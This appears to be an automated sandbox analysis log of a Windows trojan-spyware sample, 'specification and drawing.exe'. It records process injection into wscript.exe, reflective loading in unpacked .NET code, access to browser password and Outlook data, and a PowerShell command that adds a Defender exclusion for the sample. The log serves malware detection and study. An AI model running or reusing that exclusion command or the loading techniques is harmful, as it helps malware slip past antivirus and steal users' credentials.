                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_04922BA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04922BF0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922BE0 NtQueryValueKey,LdrInitializeThunk,8_2_04922BE0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922B60 NtClose,LdrInitializeThunk,8_2_04922B60
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049235C0 NtCreateMutant,LdrInitializeThunk,8_2_049235C0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049239B0 NtGetContextThread,LdrInitializeThunk,8_2_049239B0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922CC0 NtQueryVirtualMemory,8_2_04922CC0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922CF0 NtOpenProcess,8_2_04922CF0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922C00 NtQueryInformationProcess,8_2_04922C00
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922DB0 NtEnumerateKey,8_2_04922DB0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922D00 NtSetInformationFile,8_2_04922D00
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922EA0 NtAdjustPrivilegesToken,8_2_04922EA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922E30 NtWriteVirtualMemory,8_2_04922E30
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922F90 NtProtectVirtualMemory,8_2_04922F90
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922FA0 NtQuerySection,8_2_04922FA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922F60 NtCreateProcessEx,8_2_04922F60
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922AB0 NtWaitForSingleObject,8_2_04922AB0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922B80 NtQueryInformationFile,8_2_04922B80
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04923090 NtSetValueKey,8_2_04923090
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04923010 NtOpenDirectoryObject,8_2_04923010
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04923D10 NtOpenProcessToken,8_2_04923D10
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04923D70 NtOpenThread,8_2_04923D70
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_007793C0 NtCreateFile,8_2_007793C0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00779530 NtReadFile,8_2_00779530
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00779630 NtDeleteFile,8_2_00779630
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_007796E0 NtClose,8_2_007796E0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00779850 NtAllocateVirtualMemory,8_2_00779850
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00761EA08_2_00761EA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075CD508_2_0075CD50
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075CF708_2_0075CF70
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075AF708_2_0075AF70
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075AF668_2_0075AF66
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075B0C08_2_0075B0C0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075B0B48_2_0075B0B4
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_007655508_2_00765550
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_007637608_2_00763760
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0076375B8_2_0076375B
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0077BD308_2_0077BD30
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BE70C8_2_047BE70C
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BD7D88_2_047BD7D8
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047C51EC8_2_047C51EC
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BE2558_2_047BE255
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BE3788_2_047BE378
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BE89C8_2_047BE89C
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BCAB88_2_047BCAB8
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04937E54 appears 102 times
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 048DB970 appears 280 times
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0496F290 appears 105 times
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04925130 appears 58 times
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0495EA12 appears 86 times
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: String function: 0114F290 appears 105 times
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: String function: 010BB970 appears 274 times
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: String function: 01105130 appears 40 times
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: String function: 01117E54 appears 99 times
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: String function: 0113EA12 appears 86 times
                      Source: specification and drawing.exe, 00000000.00000002.2178181816.0000000002E0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000000.00000002.2187012973.00000000056C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000000.00000002.2165460201.000000000111E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000000.00000000.2121321607.0000000000A0E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOdNo.exeF vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000000.00000002.2187356402.0000000007130000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000000.00000002.2179156189.0000000003DC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000004.00000002.2401295024.00000000011BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000004.00000002.2400903312.0000000000C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs specification and drawing.exe
                      Source: specification and drawing.exeBinary or memory string: OriginalFilenameOdNo.exeF vs specification and drawing.exe
                      Source: specification and drawing.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: specification and drawing.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, hODBbAxf33qWbhEBEP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, hODBbAxf33qWbhEBEP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@15/9
                      Source: C:\Users\user\Desktop\specification and drawing.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\specification and drawing.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt1rsod1.x5z.ps1Jump to behavior
                      Source: specification and drawing.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\specification and drawing.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000993000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2599744547.0000000000966000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2599744547.0000000000993000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2597051422.0000000000966000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4585557607.0000000000966000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: specification and drawing.exeReversingLabs: Detection: 65%
                      Source: unknownProcess created: C:\Users\user\Desktop\specification and drawing.exe "C:\Users\user\Desktop\specification and drawing.exe"
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe"
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess created: C:\Users\user\Desktop\specification and drawing.exe "C:\Users\user\Desktop\specification and drawing.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\specification and drawing.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: specification and drawing.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: specification and drawing.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: wscript.pdbGCTL source: specification and drawing.exe, 00000004.00000002.2400903312.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000003.2330616460.000000000154B000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000002.4585989966.000000000156E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LfvKCNKdvt.exe, 00000007.00000002.4581617841.00000000005BE000.00000002.00000001.01000000.0000000C.sdmp, LfvKCNKdvt.exe, 0000000A.00000000.2476050477.00000000005BE000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: specification and drawing.exe, 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2403171986.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2400714562.0000000004541000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: specification and drawing.exe, specification and drawing.exe, 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000003.2403171986.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2400714562.0000000004541000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wscript.pdb source: specification and drawing.exe, 00000004.00000002.2400903312.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000003.2330616460.000000000154B000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000002.4585989966.000000000156E000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, oR1TwPqxXE1yujic7I.cs.Net Code: NZZ9TtHsjw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, oR1TwPqxXE1yujic7I.cs.Net Code: NZZ9TtHsjw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, GtaAIbrHXObmMm8GPA.cs .Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_00417475 push ebx; iretd 4_2_00417478
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_004034B0 push eax; ret 4_2_004034B2
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_004017D0 pushfd ; retf 4_2_004017D3
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_010C09AD push ecx; mov dword ptr [esp], ecx 4_2_010C09B6
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_048E09AD push ecx; mov dword ptr [esp], ecx 8_2_048E09B6
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_00770880 push ebx; ret 8_2_00770881
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_0076F465 push 2BE5A8CCh; ret 8_2_0076F46A
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_0076BA6A push eax; ret 8_2_0076BA74
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_0076DBC0 push es; iretd 8_2_0076DBC1
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_00763FC2 push ebx; iretd 8_2_00763FC5
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_047B64CB push esp; retf 8_2_047B64EA
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_047B7516 push eax; iretd 8_2_047B7527
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_047B4627 push ds; retf 8_2_047B4756
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_047B46F6 push ds; retf 8_2_047B4756
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_047C5032 push eax; ret 8_2_047C5034
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_047B60E5 push ebx; iretd 8_2_047B60E6
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_047C51EC push eax; retf 8_2_047C56D5
                      Source: C:\Windows\SysWOW64\wscript.exe Code function: 8_2_047B63FC push esp; retf 8_2_047B64EA
                      Source: specification and drawing.exe Static PE information: section name: .text entropy: 7.845321462695301

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\specification and drawing.exe Process information set: NOOPENFILEERRORBOX
